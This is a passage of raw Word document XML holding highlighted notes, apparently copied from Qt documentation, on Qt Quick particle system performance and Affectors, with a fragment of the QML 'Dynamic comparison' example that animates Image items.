          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the performance of the particle system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>largely dependent on the graphics hardware</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it is running on. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to this is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For systems </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not including</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Affectors, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>majority of the performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cost of particles will be on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GPU is better at </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>parallelizing large numbers of operations more particles can be drawn at 60FPS when Affectors are not used</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, particularly </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if modifying the particles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relatively slow</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well as </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>increasing the CPU cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of using particles. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid using them in high-volume systems where possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Some </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>easy cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where Affectors can be avoided are using timed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1844" w:history="1">
        <w:r w:rsidRPr="00E85C50">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time-triggered Affectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or setting acceleration due to gravity in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>acceleration property of the Emitter</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gravity Affector</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRDefault="00490E7E" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1845" w:history="1">
        <w:r w:rsidR="00E27D73" w:rsidRPr="005A37A4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-system-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1468" w:name="_Toc483000847"/>
      <w:bookmarkStart w:id="1469" w:name="_Toc483003840"/>
      <w:bookmarkStart w:id="1470" w:name="_Toc483604193"/>
      <w:bookmarkStart w:id="1471" w:name="_Toc483605413"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Particles Examples - System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1468"/>
      <w:bookmarkEnd w:id="1469"/>
      <w:bookmarkEnd w:id="1470"/>
      <w:bookmarkEnd w:id="1471"/>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">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E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a collection of small QML examples relating to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E753C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using Affectors in the particle system</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Each example is a small QML file emphasizing a particular type or feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">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E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic comparison compares using the particle system to getting a similar effect with the following code that dynamically instantiates Image types.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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id</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fakeEmitter</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> burst</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number</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while</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number </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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0</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> item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fakeParticle</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createObject</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root</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item</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lifeSpan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Math</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random</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5000</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5000</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item</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x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Math</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random</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root</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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root</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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item</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y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0</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number</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Component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id</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fakeParticle</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Image</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id</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container</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property</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lifeSpan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10000</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width</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32</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height</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32</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source</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc:///particleresources/glowdot.png"</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y</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0</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PropertyAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16</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to</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root</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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16</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duration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container</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lifeSpan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running</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true</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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on opacity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running</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true</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NumberAnimation</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from</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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to</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1</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duration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500</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PauseAnimation</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duration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container</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lifeSpan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1000</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NumberAnimation</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from</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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to</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0</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duration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500</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ScriptAction</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script</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container</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destroy</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lastRenderedPageBreak/>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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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E753C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
